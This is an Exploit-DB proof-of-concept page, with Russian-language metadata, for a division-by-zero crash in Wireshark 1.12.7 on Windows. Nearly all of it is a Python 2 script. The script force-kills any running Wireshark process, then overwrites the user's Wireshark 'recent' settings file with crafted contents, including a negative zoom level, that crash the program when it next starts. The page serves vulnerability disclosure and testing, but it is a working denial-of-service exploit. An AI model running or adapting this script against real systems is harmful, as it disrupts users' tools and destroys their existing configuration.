Exploit Wireshark 1.12.7 - Division by Zero Crash (PoC)

[Exploiter]

EDB-ID

38240

Проверка EDB

1. Пройдено

Автор

SPYK

Тип уязвимости

DOS

Платформа

WINDOWS

CVE

N/A

Дата публикации

2015-09-18

Wireshark 1.12.7 - Division by Zero Crash (PoC)

# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7 
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143

import os
import subprocess
import getpass

drive=os.getenv("systemdrive")
user=getpass.getuser()
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
 
def wiresharkIsPresent():
 
 ps=subprocess.check_output("tasklist")
 
 if "Wireshark.exe" in ps:
 
  return 1
 
 else:
 
  return 0
 
 
 
def killWireshark():
 
 try:
 
  res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
 
  return 1
 
 except:
 
  return 0
 
 
 
if wiresharkIsPresent():
 
 if killWireshark():
 
  print "Wireshark is killed!"
 
sploit="""
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.
 
 
# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE
 
# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE
 
# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE
 
# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE
 
# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE
 
# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE
 
# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE
 
# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE
 
# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE
 
# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE
 
# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO
 
# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS
 
# Zoom level.
# A decimal number.
gui.zoom_level: -10
 
# Bytes view.
# A decimal number.
gui.bytes_view: 0
 
# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440
 
# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428
 
# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
 
 # Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
"""
try:
	f=open(path,"w")
	f.write(sploit)
	f.close()
	print "Success!"
except:
	print "Fail :("